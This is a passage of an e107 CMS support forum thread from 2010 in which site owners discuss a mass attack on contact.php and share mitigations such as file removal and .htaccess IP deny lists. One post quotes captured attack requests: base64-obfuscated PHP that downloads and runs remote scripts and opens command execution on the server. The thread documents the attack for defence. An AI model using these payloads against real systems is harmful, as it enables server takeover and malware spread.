Contact form - Attack - Fixes

e107 CMS » Forums » e107 v1.x Support » Core Code Support << Previous thread | Next thread >>
Go to page  1 2 3 4
BillyBoy0823
Jun 28 2010, 03:17PM
Registered Member #14644
Joined: Feb 14 2005, 04:20PM
Location: Leominster, MA USA
Posts: 504
Don't PM me. You could have told me Dragonflycms WAS a derivative of Nuke, which had always been a security nightmare.

I'm not part of the development team, but I still don't appreciate you coming here and trashing a CMS I enjoy using and developing with while you go phishing for new users of YOURS. You would be better off getting MORE reviews than 11 for over 4 years added to your site and getting your cms listed at opensourcecms.org

Move on to the next CMS...
Go to top
skate323k137
Jun 28 2010, 05:01PM
Registered Member #57342
Joined: Jun 28 2010, 04:53PM
Posts: 1
I found making a modsecurity2 rule that denies the user agent 'casper bot search' blocks a lot of the inbound hammering of contact.php. Also, if the dev's don't have copies of "CASPER RFI CRACK Bot v1.1" let me know. I retained a copy of it, it mentions e107 all over the place.
[ Edited Jun 28 2010, 05:06PM ]
Go to top
septor
Jun 28 2010, 07:05PM
  • e107 Site administrator
  • e107 Security Team
  • e107 Support Team
  • e107 Documentation Team
Registered Member #37
Joined: Aug 11 2002, 03:20AM
Location: United States
Posts: 2647
DJMaze wrote ...

septor wrote ...

DJMaze wrote ...

This bug is heavily exploited at the moment.

I have a list of all infected servers that try to compromise our server: dragonflycms.org/Forums/viewtopic/t=24361/

It fails since we don't use e107/contact.php but, it does bring Apache to it's knees.

Thank you for this bug.


If you don't use e107 the fault of your server getting destroyed is not the blame of this community or this software. Saying anything else is stupid at best. You cannot be affected y an exploit that exist in a file you have never even had on your web server. Better take a look at all the other crap you have installed.



I didn't blame you and yes our server still runs on a P3 with 512MB RAM nicely until 160+ IP's started bashing us with 50 POST requests per second to contact.php which our Apache couldn't handle (8000+ page requests) to pass through our error.php.

So yes it's our crappy error.php which logs all problems that occur, sorry that we log problems for security detection.

I apologize that i noted this community of this security issue caused by the v0pCr3w and others.

Here are some POST requests data for the developers:
[author_name] => [php]echo(base64_decode("Qnlyb2VOZXQ=")).php_uname().shell_exec(base64_decode("bHdwLWRvd25sb2FkIC1hIGh0dHA6Ly83a3MuaHUvY3liZXIuanBnIGNsYXNzLnBocDt3Z2V0IGh0dHA6Ly83a3MuaHUvY3liZXIuanBnIC1PIGNsYXNzLnBocDtjZCAvdmFyL3RtcDt3Z2V0IGh0dHA6Ly93d3cuc2lpZC5jYS9lMTA3X3NvdW5kL2Nzcy5sb2c7cGVybCBjc3MubG9nO3JtIC1yZiBjc3MubG9nKjtjZCAvdmFyL3RtcDtsd3AtZG93bmxvYWQgaHR0cDovL3d3dy5zaWlkLmNhL2UxMDdfc291bmQvY3NzLmxvZztwZXJsIGNzcy5sb2c7cm0gLXJmIGNzcy5sb2cq"));die();[/php]

[author_name] => [php]echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8="));;die();[/php]

    [author_name] => [php]eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die;[/php]


[edit] Also note the security advisory listed at:
osvdb.org/show/osvdb/65291
php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability/index.html




It would appear your "server" is not equipped to handle the needs of a website that gets more than 2 visitors in a day. Perhaps instead of spending all your time developing a trashy fork of *nuke you should be purchasing better hardware so your server doesn't crash under the pressure of a normal website.

Throwing all that aside, I stand by my original statement: claiming your website was dropped (aka DDoS, which can happen to any site via any means and based on the fact that you're using a terrible CMS to begin with I seriously doubt the "problem" this CMS is having is even remotely related) by an exploit to a file (that has been fixed) in this CMS is stupid.


Edit: I would also look into some sort of request throttling, as allowing 50 requests a second from 1 connection is idiotic and will get your site tore down regardless of the file being called is 160+ persons are doing it.
[ Edited Jun 28 2010, 07:09PM ]
Go to top
Website
adamcole99
Jun 28 2010, 11:54PM
Registered Member #57351
Joined: Jun 28 2010, 11:39PM
Posts: 1
The best fix I found was to take the form off my site completely. I'm now look for a simple alternative that is more robust but I don't get many genuine contacts anyway.
Go to top
dimante
Jun 29 2010, 04:45AM
Registered Member #22233
Joined: Nov 10 2005, 10:09AM
Posts: 49
I have removed the contact.php file altogether but I still have many requests in user tracker: [-link-]

Ideas?
Go to top
Website
C6Dave
Jun 29 2010, 05:22AM
  • e107 Site administrator
  • e107 Support Team Leader
Registered Member #9506
Joined: Jul 31 2004, 12:57AM
Location: North East UK
Posts: 12341
Read [-link-] on .htaccess
Go to top
Website
Chibi-Pa_Sempai
Jun 30 2010, 10:17PM
Registered Member #50172
Joined: Mar 04 2009, 08:01AM
Posts: 33
Ok I did get rockarolla. That was a couple weeks ago. I just found a backwater site I had forgotten about had been eliminated and all kinds of files placed instead. Now I am getting the contactus.php attack. Its from Casper Bot Search and Dex Bot Search. From what I saw in other forums its happening all over. I can not believe someone is hitting all kinds of sites looking for one or two specific files.

Recently some of my site visitors have said their antivirus programs would not let them on the site. Since I run linux its a non issue for me. So I renamed contact us since I don't use it. Hope this gets fixed soon.
Go to top
Website
Chibi-Pa_Sempai
Jun 30 2010, 10:27PM
Registered Member #50172
Joined: Mar 04 2009, 08:01AM
Posts: 33
Thank god for the hostgator fellows being smarter than I. They found the Iframe in the config.php. I did not get any funky files as far as I know. But we will see if this slows them down some.
Go to top
Website
Nowwhat
Jun 30 2010, 11:20PM
  • e107 Support Team
Registered Member #38024
Joined: Jul 05 2007, 12:08PM
Location: Europe (France)
Posts: 1729
Chibi-Pa_Sempai wrote ...
...
Recently some of my site visitors have said their antivirus programs would not let them on the site. Since I run linux its a non issue for me....

Linux based web servers don't care less if they serve executable files (or other dangerous continue) that can only 'execute' on Windows PC's.
An antivirus will (should) detect the file (continue) - even if it's being served by your bread toaster.

Remember: its the message that is important, not the nature of the messenger
Go to top
Website
AndyP
Jul 01 2010, 10:52AM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
A load of my e107 sites are getting hit on the contact.php file. I deleted this file weeks ago when I read about the problem on here and have since added the required code to my .htaccess files.
I have this evening contacted my hosts to see if they could also try and block the attacks and I have pasted their reply below.
Very unhelpful and I suppose it's only a matter of time before the attacks increase and my websites gets suspended by the hosts.

--
Hello Andy,

Thank you for contacting SiteGround HelpDesk.

I am afraid that your request cannot be fulfilled. As you probably know you are hosted on a shared server and if we block particular IP address a client might complaint it access to the site is limited. Thus I will recommend you to revise the access logs for your domain and limit the IP addresses in question via the cPanel Area -> IP deny manager. This way these IP addresses will be blocked for your account and they will be not able to access it.

If you need further help, do not hesitate to contact us again.

Best Regards,

Stanislav.I
Technical Support Team
Go to top
C6Dave
Jul 01 2010, 11:33AM
  • e107 Site administrator
  • e107 Support Team Leader
Registered Member #9506
Joined: Jul 31 2004, 12:57AM
Location: North East UK
Posts: 12341
You can bypass the IP deny manager once you have added 1 IP to ban as it lists them in the .htaccess

All you need to do is paste a list into .htaccess under the one created via cPanel

like this:

deny from 90.216.195.92
deny from 90.209.111.1
deny from 213.239.200.199
deny from 212.129.63.8
deny from 212.117.187.100
deny from 208.96.213.149
deny from 201.45.57.142
deny from 142.22.16.55
deny from 122.128.100.21
deny from 120.28.64.94
deny from 88.198.3.10
deny from 78.46.88.142
deny from 66.132.251.111
deny from 64.25.54.72

Much faster way to do it.

But they aren't being helpful are they?

No such problems with fusednetwork.com
Go to top
Website
AndyP
Jul 01 2010, 11:51AM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
2dopey wrote ...

You can bypass the IP deny manager once you have added 1 IP to ban as it lists them in the .htaccess

All you need to do is paste a list into .htaccess under the one created via cPanel

like this:

deny from 90.216.195.92
deny from 90.209.111.1
deny from 213.239.200.199
deny from 212.129.63.8
deny from 212.117.187.100
deny from 208.96.213.149
deny from 201.45.57.142
deny from 142.22.16.55
deny from 122.128.100.21
deny from 120.28.64.94
deny from 88.198.3.10
deny from 78.46.88.142
deny from 66.132.251.111
deny from 64.25.54.72

Much faster way to do it.

But they aren't being helpful are they?

No such problems with fusednetwork.com


Thanks.
I also use fusednetwork for one of my bigger sites and they are SUPERB. In fact my site is hosted on the same server as [-link-] and we had problems yesterday and they sorted things really quickly.
Brilliant hosts and would recomend them to anyone.
In fact I may move a lot more of my sites to them eventually
Go to top
AndyP
Jul 01 2010, 12:04PM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
Having updated my .htaccess file as suggested I am getting messages like below in my error log in my cpanel.
This may be a stupid question, but I'm not very clever on this sort of thing, but as they are now getting the access denied message, is it safe to assume that despite them still trying to hit the contact.php file that my server won't be overloaded?

[Thu Jul 1 13:58:04 2010] [error] [client 74.208.96.47] client denied by server configuration: /home/retrospe/public_html/contact.php
Go to top
Brad R
Jul 01 2010, 12:22PM
Registered Member #18939
Joined: Jun 28 2005, 03:48PM
Location: Ontario, Canada
Posts: 286
Although this will greatly reduce the load on your server, it is still possible that the sheer number of attacks will overload it. The server can be 100% occupied just sending back the "403 Forbidden" replies.
Go to top
AndyP
Jul 01 2010, 12:29PM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
Brad R wrote ...

Although this will greatly reduce the load on your server, it is still possible that the sheer number of attacks will overload it. The server can be 100% occupied just sending back the "403 Forbidden" replies.


Thanks for the info, at least it is of some comfort.
Do you think these attacks will ever stop?
After all I no longer have the contact.php file on my server/ website. Surely they will realise this eventually, give up and/ or try somewhere else.
Go to top
Brad R
Jul 01 2010, 12:47PM
Registered Member #18939
Joined: Jun 28 2005, 03:48PM
Location: Ontario, Canada
Posts: 286
Unfortunately, they're not that bright. They just keep hammering away, as though after the first 1000 failed tries, the 1001st will magically work.
Go to top
AndyP
Jul 02 2010, 12:30AM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
I have done a complete upgrade and fresh re-install of e107 v0.7.22 and I am still experiencing repeated attempts to access the contact.php file.

Obviously they can’t hack the site because I’m running v0.7.22, but I thought the repeated attempts to access contact.php would have stopped once I upgraded my site.

Why are they still trying to access contact.php and how can I stop it?

I have made the changes to .htaccess as suggested and when they try to access contact.php they get the denied access message. However, I would like to stop them hitting my site completely as otherwise eventually the server will overload with their repeated attempts, regardless of whether I'm running v0.7.22 or not.

This could go on forever, even if I move server or use a completely different CMS.
Go to top
BillyBoy0823
Jul 02 2010, 01:37AM
Registered Member #14644
Joined: Feb 14 2005, 04:20PM
Location: Leominster, MA USA
Posts: 504
AndyP,

Brad R wrote ...

Unfortunately, they're not that bright. They just keep hammering away, as though after the first 1000 failed tries, the 1001st will magically work.



Think of a drunk going to gogle.com and he's not seeing the google page, so he keeps hitting refresh. He KEEPS hitting refresh, and you can't do a thing to stop him. Other than redirect him to something the server can do quickly, like display a blank page. Or, until a firewall blocks them from even getting there.

Hopefully someone will sober up and realize they are not getting what they want, and will use the resources for something else.

I really doubt changing the CMS or server will be more than temporary. Other CMS's are also being exploited. Just search for "{CMS name} Exploit" and look at the results count.

And one server, may be more or less secure than the next. Changing the IP address will do about the same, but they will hunt you down.

I am a conspiracy theorist and often wonder if the competition is up to no good (been there).

Here's thread I started on a good article I read.

[-link-]
[ Edited Jul 02 2010, 01:39AM ]
Go to top
C6Dave
Jul 02 2010, 02:51AM
  • e107 Site administrator
  • e107 Support Team Leader
Registered Member #9506
Joined: Jul 31 2004, 12:57AM
Location: North East UK
Posts: 12341
ChicksHateMe wrote ...


Think of a drunk going to gogle.com and he's not seeing the google page, so he keeps hitting refresh. He KEEPS hitting refresh, and you can't do a thing to stop him. Other than redirect him to something the server can do quickly, like display a blank page.

Whole point is, it's not a person, but an automated script that will never get tired of trying....................................
Go to top
Website
Brad R
Jul 02 2010, 03:04AM
Registered Member #18939
Joined: Jun 28 2005, 03:48PM
Location: Ontario, Canada
Posts: 286
AndyP wrote ...
Why are they still trying to access contact.php and how can I stop it?

I have made the changes to .htaccess as suggested and when they try to access contact.php they get the denied access message. However, I would like to stop them hitting my site completely as otherwise eventually the server will overload with their repeated attempts, regardless of whether I'm running v0.7.22 or not.

This could go on forever, even if I move server or use a completely different CMS.


Like I said, they're not that bright. They've got your domain name pegged as "an e107 site" and they're going to keep hitting it until they crack it. The fact that you're patched against their exploit won't stop them. Getting rid of e107 entirely won't stop them. Moving to a different server won't stop them. The only way you can get rid of them is to change to a new domain name, and not redirect your old domain name to the new one -- and you probably don't want to do that.

It's out of your (and our) control. This will go on until either ( a) the ISPs hosting the bots realize what's going on, and start closing them down, or ( b) those ISPs start getting blacklisted from the Internet in general, by having their IPs blocked at the routers. Don't expect ( b) to happen any time soon...if at all. For ( a) to happen, someone needs to collect the IP addresses of the attackers and report the abuse back to the originating ISPs. Many someones need to do this. And even then, some of the ISPs may not care.

Bottom line, we may need to live with this until the script kiddies get bored.
Go to top
Go to page  1 2 3 4  

Jump:     Back to top

Syndicate this thread: rss 0.92 Syndicate this thread: rss 2.0 Syndicate this thread: RDF
Powered by e107 Forum System
e107 - Free CMS | Open Source Content Management System
http://www.arvixe.com/4363-148-1-569.html
© 2008 - 2013 e107 Inc.
All product names mentioned herein are the trademarks of their respective owners. In addition, images, logos, pictures or other material may be trademarks or registered trademarks of their respective owners. Emote images by seb, released under the GPL license. With the kind support of Corllete Lab Studio. Forum Icons by Axialis Team.
Created by e107 Inc